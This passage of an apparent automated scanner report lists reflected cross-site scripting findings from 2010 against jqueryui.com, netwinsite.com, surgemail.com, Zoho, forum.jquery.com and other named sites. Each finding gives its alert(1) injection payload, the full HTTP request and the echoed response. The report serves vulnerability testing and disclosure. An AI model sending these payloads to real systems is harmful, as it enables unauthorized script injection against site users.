The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 22a31<script>alert(1)</script>5d4a7e54332 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr=ffDefault=Helvetica,Arial,sans-serif22a31<script>alert(1)</script>5d4a7e54332&fwDefault=normal&fsDefault=1.1em&cornerRadius=6px&bgColorHeader=cb842e&bgTextureHeader=02_glass.png&bgImgOpacityHeader=25&borderColorHeader=d49768&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=f4f0ec&bgTextureContent=05_inset_soft.png&bgImgOpacityContent=100&borderColorContent=e0cfc2&fcContent=1e1b1d&iconColorContent=c47a23&bgColorDefault=ede4d4&bgTextureDefault=02_glass.png&bgImgOpacityDefault=70&borderColorDefault=cdc3b7&fcDefault=3f3731&iconColorDefault=f08000&bgColorHover=f5f0e5&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=f5ad66&fcHover=a46313&iconColorHover=f08000&bgColorActive=f4f0ec&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=100&borderColorActive=e0cfc2&fcActive=b85700&iconColorActive=f35f07&bgColorHighlight=f5f5b5&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=75&borderColorHighlight=d9bb73&fcHighlight=060200&iconColorHighlight=cb672b&bgColorError=fee4bd&bgTextureError=04_highlight_hard.png&bgImgOpacityError=65&borderColorError=f8893f&fcError=592003&iconColorError=ff7519&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=75&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17967


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr=ffDefault=Helvetica,Arial,sans-serif22a31<script>alert(1)</script>5d4a7e54332&fwDefault=normal&fsDefault=1.1em&cornerRadius=6px&bgColorHeader=cb842e&bgTextureHeader=02_glass.png&bgImgOpacityHeader=25&borderColorHeader=d49768&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent
...[SNIP]...

1.241. http://jqueryui.com/themeroller/css/parseTheme.css.php [tr&ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the tr&ffDefault request parameter is copied into the HTML document as plain text between tags. The payload c416e<script>alert(1)</script>8e010dd02bb was submitted in the tr&ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serifc416e<script>alert(1)</script>8e010dd02bb&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:13 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serifc416e<script>alert(1)</script>8e010dd02bb&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ff
...[SNIP]...

1.242. http://netwinsite.com/cgi-bin/keycgi.exe [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netwinsite.com
Path:   /cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the HTML document as plain text between tags. The payload 2d4eb<script>alert(1)</script>700011dbac7 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemail2d4eb<script>alert(1)</script>700011dbac7& HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:29 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<b>'surgemail2d4eb<script>alert(1)</script>700011dbac7'</b>
...[SNIP]...

1.243. http://netwinsite.com/cgi-bin/keycgi.exe [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netwinsite.com
Path:   /cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c373f"><script>alert(1)</script>b1252f723a1 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemailc373f"><script>alert(1)</script>b1252f723a1& HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:27 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<input type="hidden" name="product" value="surgemailc373f"><script>alert(1)</script>b1252f723a1">
...[SNIP]...

1.244. https://netwinsite.com/cgi-bin/keycgi.exe [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://netwinsite.com
Path:   /cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the HTML document as plain text between tags. The payload d21cc<script>alert(1)</script>a7e6f514dd4 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=buy_new&product=surgemaild21cc<script>alert(1)</script>a7e6f514dd4 HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:32 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<font face="Arial, Helvetica, sans-serif" size="4">Unable to find productid for (surgemaild21cc<script>alert(1)</script>a7e6f514dd4)
</font>
...[SNIP]...

1.245. http://news.netwinsite.com:8119/webnews [group parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.netwinsite.com:8119
Path:   /webnews

Issue detail

The value of the group request parameter is copied into the HTML document as plain text between tags. The payload ab3ba<script>alert(1)</script>8494d9617b4 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webnews?group=netwin.surgemailab3ba<script>alert(1)</script>8494d9617b4&cmd=list HTTP/1.1
Host: news.netwinsite.com:8119
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DManager
MIME-version: 1.0
WWW-Authenticate: Basic realm="surgenews.netwin.netwinsite.com"
Date: Tue, 16 Nov 2010 00:19:31 GMT
Content-type: text/html
Set-Cookie: webnews=4b2be152_cookie; expires=Tue, 24-May-2011 19:19:31 GMT


<!-- Start of error.htm -->
<html>

<head>
<title>Listing of netwin.surgemailab3ba<script>alert(1)</script>8494d9617b4</title>

<!-- Start of style.htm -->
<LINK REL = "stylesheet" TYPE = "text/css"
...[SNIP]...
<b>411 no such newsgroup (netwin.surgemailab3ba<script>alert(1)</script>8494d9617b4)</b>
...[SNIP]...

1.246. http://news.netwinsite.com:8119/webnews [group parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.netwinsite.com:8119
Path:   /webnews

Issue detail

The value of the group request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b57d"><script>alert(1)</script>d1d4c945d27 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webnews?group=netwin.surgemail6b57d"><script>alert(1)</script>d1d4c945d27&cmd=list HTTP/1.1
Host: news.netwinsite.com:8119
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DManager
MIME-version: 1.0
WWW-Authenticate: Basic realm="surgenews.netwin.netwinsite.com"
Date: Tue, 16 Nov 2010 00:19:31 GMT
Content-type: text/html
Set-Cookie: webnews=4b2be152_cookie; expires=Tue, 24-May-2011 19:19:31 GMT


<!-- Start of error.htm -->
<html>

<head>
<title>Listing of netwin.surgemail6b57d"><script>alert(1)</script>d1d4c945d27</title>

<!-- Start of style.htm -->
<LINK REL = "stylesheet" TYPE = "text/css
...[SNIP]...
<a class="hrefbutton" href="/webnews?cmd=unsub&group=netwin.surgemail6b57d"><script>alert(1)</script>d1d4c945d27&sid=653664256">
...[SNIP]...

1.247. http://news.netwinsite.com:8119/webnews [group parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.netwinsite.com:8119
Path:   /webnews

Issue detail

The value of the group request parameter is copied into the HTML document as text between TITLE tags. The payload 255e7</title><script>alert(1)</script>cf6af4a657 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webnews?group=netwin.surgemail255e7</title><script>alert(1)</script>cf6af4a657&cmd=list HTTP/1.1
Host: news.netwinsite.com:8119
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DManager
MIME-version: 1.0
WWW-Authenticate: Basic realm="surgenews.netwin.netwinsite.com"
Date: Tue, 16 Nov 2010 00:19:31 GMT
Content-type: text/html
Set-Cookie: webnews=4b2be152_cookie; expires=Tue, 24-May-2011 19:19:31 GMT


<!-- Start of error.htm -->
<html>

<head>
<title>Listing of netwin.surgemail255e7</title><script>alert(1)</script>cf6af4a657</title>

<!-- Start of style.htm -->
<LINK REL = "stylesheet" TYPE = "tex
...[SNIP]...

1.248. http://st247.qanalyze.com/qanalyze_js.php [idSite parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://st247.qanalyze.com
Path:   /qanalyze_js.php

Issue detail

The value of the idSite request parameter is copied into a JavaScript rest-of-line comment. The payload e5e0d%0aalert(1)//cc15b1eab6a was submitted in the idSite parameter. This input was echoed as e5e0d
alert(1)//cc15b1eab6a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qanalyze_js.php?refElement=top-part&idSite=2e5e0d%0aalert(1)//cc15b1eab6a HTTP/1.1
Host: st247.qanalyze.com
Proxy-Connection: keep-alive
Referer: http://www.icewarp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:14 GMT
Server: Apache/2.2.6 (Win32) mod_ssl/2.2.6 OpenSSL/0.9.8e mod_wsgi/2.4-BRANCH Python/2.6.1 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Type: application/javascript
Content-Length: 122082


var QStats,qStats_log,qStats_track;if(!this.QStats){QStats=(function(){var c,i={},e=document,d=navigator,g=screen,l=window,f=false,n=[];function m(p){return typeof p!=="undefined"}function h(p,r,q,s)
...[SNIP]...
otkeys - end
*/

jQuery.noConflict();var heatmapSettingsRefId='top-part';var heatmapSettingsServiceUrl='http://st247.qanalyze.com';var heatmapSettingsUrlSite=location.href;var heatmapSettingsIdSite=2e5e0d
alert(1)//cc15b1eab6a
;var refObject;
function setRefObject(id){if(document.getElementById(id)){refObject=document.getElementById(id)}else{refObject=document.getElementsByTagName('body')}}var swfHeatmapShow=false;var resizi
...[SNIP]...

1.249. http://st247.qanalyze.com/qanalyze_js.php [refElement parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://st247.qanalyze.com
Path:   /qanalyze_js.php

Issue detail

The value of the refElement request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fe9a3%3balert(1)//86ef6e8bda0 was submitted in the refElement parameter. This input was echoed as fe9a3;alert(1)//86ef6e8bda0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /qanalyze_js.php?refElement=top-partfe9a3%3balert(1)//86ef6e8bda0&idSite=2 HTTP/1.1
Host: st247.qanalyze.com
Proxy-Connection: keep-alive
Referer: http://www.icewarp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:10 GMT
Server: Apache/2.2.6 (Win32) mod_ssl/2.2.6 OpenSSL/0.9.8e mod_wsgi/2.4-BRANCH Python/2.6.1 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Type: application/javascript
Content-Length: 122109


var QStats,qStats_log,qStats_track;if(!this.QStats){QStats=(function(){var c,i={},e=document,d=navigator,g=screen,l=window,f=false,n=[];function m(p){return typeof p!=="undefined"}function h(p,r,q,s)
...[SNIP]...
Browser = "";
var qAnalyzeDocument = "";
var qAnalyzeWait = 500;
var qAnalyzeLocalWait = 0;
var qAnalyzeDebug = (window.location.href.search(/debugqanalyze/) !== -1);
var qAnalyzeRefElement = "top-partfe9a3;alert(1)//86ef6e8bda0";

function showQAnalyzeDebug(a){if(qAnalyzeDebug===true){document.getElementById("qAnalyzeDebuggerSpan").innerHTML=a;document.getElementById("qAnalyzeDebuggerDiv").style.display="block"}}
function c
...[SNIP]...

1.250. http://translate-pirate.com/cgi-bin/xlate.cgi [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://translate-pirate.com
Path:   /cgi-bin/xlate.cgi

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 2bfcf<script>alert(1)</script>8a3f44bef49 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/xlate.cgi?page=netwinsite.com2bfcf<script>alert(1)</script>8a3f44bef49 HTTP/1.1
Host: translate-pirate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 195
Connection: close
Content-Type: text/html

Page to translate is (netwinsite.com2bfcf<script>alert(1)</script>8a3f44bef49)<br>
Download failed (tcp: open (netwinsite.com2bfcf<script>alert(1)<) failed (Err Code Zero gethostbyname failed)
)

1.251. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 834bc"><script>alert(1)</script>e0de654d2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 834bc\"><script>alert(1)</script>e0de654d2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?834bc"><script>alert(1)</script>e0de654d2de=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:48:19 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1289868499+174.122.23.218; path=/
Set-Cookie: PHPSESSID=683e938acdaeb9c30dfc559031374042; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="/?834bc\"><script>alert(1)</script>e0de654d2de=1/lang-pref/en/">
...[SNIP]...

1.252. http://www.surgemail.com/cgi-bin/keycgi.exe [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.surgemail.com
Path:   /cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feacf"><script>alert(1)</script>aa416f6a094 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemailfeacf"><script>alert(1)</script>aa416f6a094& HTTP/1.1
Host: www.surgemail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:49:08 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<input type="hidden" name="product" value="surgemailfeacf"><script>alert(1)</script>aa416f6a094">
...[SNIP]...

1.253. http://www.surgemail.com/cgi-bin/keycgi.exe [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.surgemail.com
Path:   /cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the HTML document as plain text between tags. The payload 6b713<script>alert(1)</script>ccee403b38e was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemail6b713<script>alert(1)</script>ccee403b38e& HTTP/1.1
Host: www.surgemail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:49:10 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<b>'surgemail6b713<script>alert(1)</script>ccee403b38e'</b>
...[SNIP]...

1.254. https://accounts.zoho.com/login [iamcsr cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the iamcsr cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9241'-alert(1)-'223bb6c4a58 was submitted in the iamcsr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=56D46261849046C7540AB31DBC7DA0AD; iamcsr=8ef599d1-4822-4851-912e-a79d06e36308f9241'-alert(1)-'223bb6c4a58; IAMAGENTTICKET=;

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:47 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
rlencoded; charset=UTF-8');objHTTP.send(params);eval(objHTTP.responseText);}

function resendConfirmation(eid) {
   var csrfParam = 'iamcsrcoo=8ef599d1-4822-4851-912e-a79d06e36308f9241'-alert(1)-'223bb6c4a58';
   var params = "email="+euc(eid.toLowerCase())+"&"+csrfParam;//No I18N
   sendRequest("/u/em/confirm", params);//No I18N
   return false;
}

    function
...[SNIP]...

1.255. http://forum.jquery.com/ [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 985a5"-alert(1)-"e07f02016a2 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forum.jquery.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=44433727; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb985a5"-alert(1)-"e07f02016a2; JSESSIONID=AD357A14E7FC954350E517D74E9E548F

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:08:14 GMT
Server: Apache-Coyote/1.1
Content-Length: 412028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb985a5"-alert(1)-"e07f02016a2";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.256. http://forum.jquery.com/ [zdccn cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde1c"><script>alert(1)</script>bcffdbcc616 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

